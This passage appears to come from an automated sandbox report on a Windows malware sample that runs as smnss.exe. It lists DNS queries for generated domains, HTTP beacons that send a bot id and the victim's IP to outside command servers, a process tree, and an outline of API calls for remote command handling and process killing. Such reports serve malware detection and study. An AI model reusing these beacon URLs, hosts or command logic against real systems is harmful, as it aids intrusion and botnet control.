                                                                        Nov 7, 2022 22:12:56.159048080 CET53631878.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:56.185034990 CET6476053192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:56.206655979 CET53647608.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:56.215338945 CET5363753192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:56.237253904 CET53536378.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:13:01.220931053 CET6201853192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:13:01.241372108 CET53620188.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:13:01.256602049 CET5015553192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:13:01.274228096 CET53501558.8.8.8192.168.2.7
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 7, 2022 22:12:51.132823944 CET192.168.2.78.8.8.80x7b88Standard query (0)shpqsasmrn.bizA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:51.191030025 CET192.168.2.78.8.8.80x8180Standard query (0)rmhhhmswqh.orgA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:51.870985031 CET192.168.2.78.8.8.80xfc5cStandard query (0)whenaeqsar.inA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:52.522798061 CET192.168.2.78.8.8.80x6c61Standard query (0)pqarseshhn.inA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:53.077461004 CET192.168.2.78.8.8.80x1632Standard query (0)meahewphwa.inA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:53.816359043 CET192.168.2.78.8.8.80xc0dcStandard query (0)psmrewwhhh.inA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:53.853588104 CET192.168.2.78.8.8.80xc7f6Standard query (0)hmpasnpmas.netA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.237385035 CET192.168.2.78.8.8.80x86deStandard query (0)raheepmpnn.orgA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.386275053 CET192.168.2.78.8.8.80x9393Standard query (0)mwpmmeshma.inA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.424782038 CET192.168.2.78.8.8.80x8a16Standard query (0)rwqmwaahsa.orgA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.538871050 CET192.168.2.78.8.8.80x72d6Standard query (0)snshrmsmmh.bizA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.653773069 CET192.168.2.78.8.8.80x8c90Standard query (0)qmmmshpqan.infoA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.801687956 CET192.168.2.78.8.8.80xe5bfStandard query (0)sephpsappn.bizA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.829339981 CET192.168.2.78.8.8.80x1743Standard query (0)qpnrsrhean.infoA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.942092896 CET192.168.2.78.8.8.80x9c77Standard query (0)hmaeshmwmh.netA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.990499973 CET192.168.2.78.8.8.80x1d5dStandard query (0)anmmemmqms.comA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.021465063 CET192.168.2.78.8.8.80x4442Standard query (0)swrhaapnnr.bizA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.051340103 CET192.168.2.78.8.8.80x618dStandard query (0)ampsqhrras.comA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.104875088 CET192.168.2.78.8.8.80x5b2cStandard query (0)hemqhqaema.netA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.160862923 CET192.168.2.78.8.8.80xd002Standard query (0)nhmqhmsrph.usA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.208024025 CET192.168.2.78.8.8.80x9b5bStandard query (0)shwwnharma.bizA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.237596035 CET192.168.2.78.8.8.80x2a8aStandard query (0)namrhepwnn.usA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.292572975 CET192.168.2.78.8.8.80xa3dfStandard query (0)wwqeemeesr.inA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.345704079 CET192.168.2.78.8.8.80x2882Standard query (0)prnaqpsqar.inA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.385701895 CET192.168.2.78.8.8.80x271aStandard query (0)memmshersa.inA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.453497887 CET192.168.2.78.8.8.80xb4deStandard query (0)rwneseeers.orgA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.538671970 CET192.168.2.78.8.8.80x6ed5Standard query (0)enahmnhqah.wsA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.018393040 CET192.168.2.78.8.8.80xd759Standard query (0)nmnhwanmwh.usA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.071533918 CET192.168.2.78.8.8.80xeac4Standard query (0)shmsemwams.bizA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.109869003 CET192.168.2.78.8.8.80x9f8cStandard query (0)nnrhanmhwn.usA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.137121916 CET192.168.2.78.8.8.80xc29dStandard query (0)hsqrpmnhwa.netA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.185034990 CET192.168.2.78.8.8.80x3c96Standard query (0)pnhhpawqpa.inA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.215338945 CET192.168.2.78.8.8.80xfc67Standard query (0)hpeemnapan.netA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:13:01.220931053 CET192.168.2.78.8.8.80x6351Standard query (0)amnrsmaaqh.comA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:13:01.256602049 CET192.168.2.78.8.8.80x408Standard query (0)erwrahwnhs.wsA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 7, 2022 22:12:51.153758049 CET8.8.8.8192.168.2.70x7b88Name error (3)shpqsasmrn.biznonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:51.324410915 CET8.8.8.8192.168.2.70x8180No error (0)rmhhhmswqh.org72.251.233.245A (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:51.976210117 CET8.8.8.8192.168.2.70xfc5cNo error (0)whenaeqsar.in107.6.74.76A (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:52.541891098 CET8.8.8.8192.168.2.70x6c61No error (0)pqarseshhn.in173.231.189.15A (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:53.183758020 CET8.8.8.8192.168.2.70x1632No error (0)meahewphwa.in199.21.76.81A (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:53.837687016 CET8.8.8.8192.168.2.70xc0dcName error (3)psmrewwhhh.innonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:53.960973024 CET8.8.8.8192.168.2.70xc7f6No error (0)hmpasnpmas.net173.231.184.124A (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.345000982 CET8.8.8.8192.168.2.70x86deName error (3)raheepmpnn.orgnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.407438040 CET8.8.8.8192.168.2.70x9393Name error (3)mwpmmeshma.innonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.531301975 CET8.8.8.8192.168.2.70x8a16Name error (3)rwqmwaahsa.orgnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.562329054 CET8.8.8.8192.168.2.70x72d6Name error (3)snshrmsmmh.biznonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.755705118 CET8.8.8.8192.168.2.70x8c90Name error (3)qmmmshpqan.infononenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.820895910 CET8.8.8.8192.168.2.70xe5bfName error (3)sephpsappn.biznonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.935261965 CET8.8.8.8192.168.2.70x1743Name error (3)qpnrsrhean.infononenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:54.964406967 CET8.8.8.8192.168.2.70x9c77Name error (3)hmaeshmwmh.netnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.012821913 CET8.8.8.8192.168.2.70x1d5dName error (3)anmmemmqms.comnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.042834044 CET8.8.8.8192.168.2.70x4442Name error (3)swrhaapnnr.biznonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.071094036 CET8.8.8.8192.168.2.70x618dName error (3)ampsqhrras.comnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.124351978 CET8.8.8.8192.168.2.70x5b2cName error (3)hemqhqaema.netnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.181926966 CET8.8.8.8192.168.2.70xd002Name error (3)nhmqhmsrph.usnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.228588104 CET8.8.8.8192.168.2.70x9b5bName error (3)shwwnharma.biznonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.258826017 CET8.8.8.8192.168.2.70x2a8aName error (3)namrhepwnn.usnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.311794043 CET8.8.8.8192.168.2.70xa3dfName error (3)wwqeemeesr.innonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.367105007 CET8.8.8.8192.168.2.70x2882Name error (3)prnaqpsqar.innonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.406841040 CET8.8.8.8192.168.2.70x271aName error (3)memmshersa.innonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.529980898 CET8.8.8.8192.168.2.70xb4deName error (3)rwneseeers.orgnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:55.586803913 CET8.8.8.8192.168.2.70x6ed5No error (0)enahmnhqah.ws64.70.19.203A (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.039815903 CET8.8.8.8192.168.2.70xd759Name error (3)nmnhwanmwh.usnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.092576981 CET8.8.8.8192.168.2.70xeac4Name error (3)shmsemwams.biznonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.130729914 CET8.8.8.8192.168.2.70x9f8cName error (3)nnrhanmhwn.usnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.159048080 CET8.8.8.8192.168.2.70xc29dName error (3)hsqrpmnhwa.netnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.206655979 CET8.8.8.8192.168.2.70x3c96Name error (3)pnhhpawqpa.innonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:12:56.237253904 CET8.8.8.8192.168.2.70xfc67Name error (3)hpeemnapan.netnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:13:01.241372108 CET8.8.8.8192.168.2.70x6351Name error (3)amnrsmaaqh.comnonenoneA (IP address)IN (0x0001)false
                                                                        Nov 7, 2022 22:13:01.274228096 CET8.8.8.8192.168.2.70x408No error (0)erwrahwnhs.ws64.70.19.203A (IP address)IN (0x0001)false
                                                                        • rmhhhmswqh.org
                                                                        • whenaeqsar.in
                                                                        • pqarseshhn.in
                                                                        • meahewphwa.in
                                                                        • hmpasnpmas.net
                                                                        • enahmnhqah.ws
                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.74970972.251.233.24580C:\Windows\SysWOW64\smnss.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 7, 2022 22:12:51.587059021 CET91OUTGET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1
                                                                        Host: rmhhhmswqh.org
                                                                        User-Agent: explwer
                                                                        Nov 7, 2022 22:12:51.848068953 CET92INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 07 Nov 2022 21:12:51 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=7de68761dbfed8aed4d14490d48efc29|102.129.143.15|1667855571|1667855571|0|1|0; path=/; domain=.rmhhhmswqh.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Set-Cookie: snkz=102.129.143.15; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.749710107.6.74.7680C:\Windows\SysWOW64\smnss.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 7, 2022 22:12:52.238913059 CET92OUTGET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1
                                                                        Host: whenaeqsar.in
                                                                        User-Agent: explwer
                                                                        Nov 7, 2022 22:12:52.499655008 CET93INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 07 Nov 2022 21:12:52 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=505e7caf1e170b0a728d801a5dafc455|102.129.143.15|1667855572|1667855572|0|1|0; path=/; domain=.whenaeqsar.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Set-Cookie: snkz=102.129.143.15; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.749711173.231.189.1580C:\Windows\SysWOW64\smnss.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 7, 2022 22:12:52.680763960 CET94OUTGET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1
                                                                        Host: pqarseshhn.in
                                                                        User-Agent: explwer
                                                                        Nov 7, 2022 22:12:52.802999973 CET94INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 07 Nov 2022 21:12:52 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=db0d9c67e91c750b936ff558aef165fe|102.129.143.15|1667855572|1667855572|0|1|0; path=/; domain=.pqarseshhn.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Set-Cookie: snkz=102.129.143.15; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.749712199.21.76.8180C:\Windows\SysWOW64\smnss.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 7, 2022 22:12:53.587512970 CET95OUTGET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1
                                                                        Host: meahewphwa.in
                                                                        User-Agent: explwer
                                                                        Nov 7, 2022 22:12:53.757191896 CET95INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 07 Nov 2022 21:12:53 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=3c504d6a40e1f700faaa3045b80061ff|102.129.143.15|1667855573|1667855573|0|1|0; path=/; domain=.meahewphwa.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Set-Cookie: snkz=102.129.143.15; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.749715173.231.184.12480C:\Windows\SysWOW64\smnss.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 7, 2022 22:12:54.099023104 CET101OUTGET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1
                                                                        Host: hmpasnpmas.net
                                                                        User-Agent: explwer
                                                                        Nov 7, 2022 22:12:54.222419977 CET103INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 07 Nov 2022 21:12:54 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=8bb105ddbe4f8f8f5a214b7824ec9269|102.129.143.15|1667855574|1667855574|0|1|0; path=/; domain=.hmpasnpmas.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Set-Cookie: snkz=102.129.143.15; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.74973664.70.19.20380C:\Windows\SysWOW64\smnss.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 7, 2022 22:12:55.807492971 CET110OUTGET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1
                                                                        Host: enahmnhqah.ws
                                                                        User-Agent: explwer


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:22:12:46
                                                                        Start date:07/11/2022
                                                                        Path:C:\Users\user\Desktop\GxELazkKkG.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\GxELazkKkG.exe
                                                                        Imagebase:0x400000
                                                                        File size:94062 bytes
                                                                        MD5 hash:A3B0B86095211519A0E93F79FBECEA26
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Target ID:1
                                                                        Start time:22:12:47
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\smnss.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\smnss.exe
                                                                        Imagebase:0x400000
                                                                        File size:94062 bytes
                                                                        MD5 hash:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        Reputation:low

                                                                        Target ID:2
                                                                        Start time:22:12:48
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\smnss.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\smnss.exe
                                                                        Imagebase:0x400000
                                                                        File size:94062 bytes
                                                                        MD5 hash:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Target ID:3
                                                                        Start time:22:12:48
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\smnss.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\smnss.exe
                                                                        Imagebase:0x400000
                                                                        File size:94062 bytes
                                                                        MD5 hash:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Target ID:4
                                                                        Start time:22:12:49
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\smnss.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\smnss.exe
                                                                        Imagebase:0x400000
                                                                        File size:94062 bytes
                                                                        MD5 hash:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Target ID:5
                                                                        Start time:22:12:49
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\smnss.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\smnss.exe
                                                                        Imagebase:0x400000
                                                                        File size:94062 bytes
                                                                        MD5 hash:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Target ID:6
                                                                        Start time:22:12:50
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\smnss.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\smnss.exe
                                                                        Imagebase:0x400000
                                                                        File size:94062 bytes
                                                                        MD5 hash:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Target ID:7
                                                                        Start time:22:12:50
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\smnss.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\smnss.exe
                                                                        Imagebase:0x400000
                                                                        File size:94062 bytes
                                                                        MD5 hash:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Target ID:8
                                                                        Start time:22:12:51
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\ctfmen.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:ctfmen.exe
                                                                        Imagebase:0x400000
                                                                        File size:4160 bytes
                                                                        MD5 hash:BEFB073B1AE52E909D4EA54A5251185D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        Reputation:low

                                                                        Target ID:9
                                                                        Start time:22:12:51
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\smnss.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\smnss.exe
                                                                        Imagebase:0x400000
                                                                        File size:94062 bytes
                                                                        MD5 hash:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Target ID:10
                                                                        Start time:22:12:51
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\smnss.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\smnss.exe
                                                                        Imagebase:0x400000
                                                                        File size:94062 bytes
                                                                        MD5 hash:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Target ID:13
                                                                        Start time:22:12:55
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1284
                                                                        Imagebase:0xa50000
                                                                        File size:434592 bytes
                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Target ID:18
                                                                        Start time:22:13:07
                                                                        Start date:07/11/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff732630000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:11.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:8.4%
                                                                          Total number of Nodes:1694
                                                                          Total number of Limit Nodes:25
                                                                          execution_graph 5944 409f42 5945 409f50 5944->5945 5948 409f00 5945->5948 5949 4094a0 strcmp 5948->5949 5950 409f1c 5949->5950 5951 40bf42 5952 40bf50 TlsAlloc 5951->5952 5953 40bf80 GetLastError 5952->5953 5954 40bf63 5952->5954 4834 10001e04 xstrchr 4835 10001eb3 4834->4835 4836 10001edc xstrchr 4834->4836 4836->4835 5955 407144 memset memset _mbscat 6027 405362 5955->6027 5962 40735f TerminateThread 5962->5962 5967 407342 5962->5967 5963 40739f TerminateThread 5963->5963 5963->5967 5964 404f0a 3 API calls 5964->5967 5965 4073c4 Sleep 5965->5967 5966 405434 6 API calls 5966->5967 5967->5962 5967->5963 5967->5964 5967->5965 5967->5966 5968 407424 send 5967->5968 5969 4073fb Sleep 5967->5969 6007 407c13 closesocket Sleep 5967->6007 6025 407bc7 CreateThread 5967->6025 5970 407473 recv 5968->5970 5969->5967 5977 407412 5970->5977 5971 407c3e 5972 4074de strtok 5973 4074ff strtok 5972->5973 5973->5973 5974 407520 lstrcmp 5973->5974 5975 407541 atoi atoi 5974->5975 5976 4076ae lstrcmp 5974->5976 5979 4075b1 atoi 5975->5979 5980 407586 lstrcmp 5975->5980 5978 407711 lstrcmp 5976->5978 5994 407655 5976->5994 5977->5970 5977->5971 5977->5972 5983 40777e lstrcmp 5978->5983 5984 40772e 5978->5984 5985 4075f0 lstrcmp 5979->5985 5986 40761b atoi 5979->5986 5980->5979 5981 4075a0 atoi 5980->5981 5981->5979 5988 4077e2 lstrcmp 5983->5988 5989 40779b CreateThread 5983->5989 5984->5983 5987 407743 CreateThread 5984->5987 5985->5986 5990 40760a atoi 5985->5990 5991 40762a lstrcmp 5986->5991 5986->5994 5987->5983 5992 407803 memset 5988->5992 5993 4078ed lstrcmp 5988->5993 5989->5988 5990->5986 5991->5994 5995 407644 atoi 5991->5995 5996 407837 5992->5996 5998 40790a atoi 5993->5998 5999 40792e lstrcmp 5993->5999 5994->5976 5997 407662 CreateThread 5994->5997 6001 4048e2 4 API calls 5994->6001 5995->5994 6006 40784d memset CreateProcessA 5996->6006 5997->5976 5997->5997 6000 40791c 5998->6000 6002 4079c5 lstrcmp 5999->6002 6020 40794b 5999->6020 6043 404ca6 6000->6043 6001->5978 6004 407a28 lstrcmp 6002->6004 6010 4079e2 6002->6010 6005 407a8b lstrcmp 6004->6005 6015 407a45 6004->6015 6005->6007 6008 407aac atoi atoi 6005->6008 6036 404d3a CreateToolhelp32Snapshot Process32First 6006->6036 6007->5967 6011 407b13 atoi 6008->6011 6012 407ae5 lstrcmp 6008->6012 6019 4048e2 4 API calls 6010->6019 6017 407b52 lstrcmp 6011->6017 6018 407b7d atoi 6011->6018 6012->6011 6016 407b02 atoi 6012->6016 6014 404690 5 API calls 6014->6020 6023 4048e2 4 API calls 6015->6023 6016->6011 6017->6018 6021 407b6c atoi 6017->6021 6018->5967 6022 407b8c lstrcmp 6018->6022 6019->6004 6020->6014 6026 404690 5 API calls 6020->6026 6021->6018 6022->5967 6024 407ba9 atoi 6022->6024 6023->6005 6024->5967 6025->6007 6025->6025 6026->6002 6028 405387 6027->6028 6029 404748 4 API calls 6028->6029 6030 4053b7 _mbscat 6029->6030 6031 405316 gethostname gethostbyname 6030->6031 6032 405347 inet_ntoa 6031->6032 6033 40535b _mbscat 6031->6033 6032->6033 6034 405256 GetVersionExA 6033->6034 6035 405283 _mbscat _mbscat _mbscat 6034->6035 6035->5967 6037 404d85 6036->6037 6038 404dec 6036->6038 6039 404d8b strcmp 6037->6039 6038->5993 6040 404dd3 Process32Next 6039->6040 6041 404d9b OpenProcess 6039->6041 6040->6038 6040->6039 6041->6040 6042 404dc0 TerminateProcess 6041->6042 6042->6040 6044 404cc6 6043->6044 6045 4048e2 4 API calls 6044->6045 6046 404cdd 6045->6046 6046->5999 4790 10002806 rot13 Get_Reg_SZ 4791 10002852 sss_rans Write_REG_SZ 4790->4791 4792 10002899 rot13 add_system_direcroty filetyt 4790->4792 4791->4792 4793 100029ab 4792->4793 4794 100028df wsprintfA CreateFileA 4792->4794 4794->4793 4795 10002953 WriteFile CloseHandle SetFileAttributesA 4794->4795 4795->4793 4837 406a48 4844 404eae GetTickCount srand rand 4837->4844 4839 406abd wsprintfA 4840 406b2e 4839->4840 4842 406b95 4840->4842 4843 406b4d send closesocket Sleep 4840->4843 4845 405434 WSASocketA 4840->4845 4843->4840 4844->4839 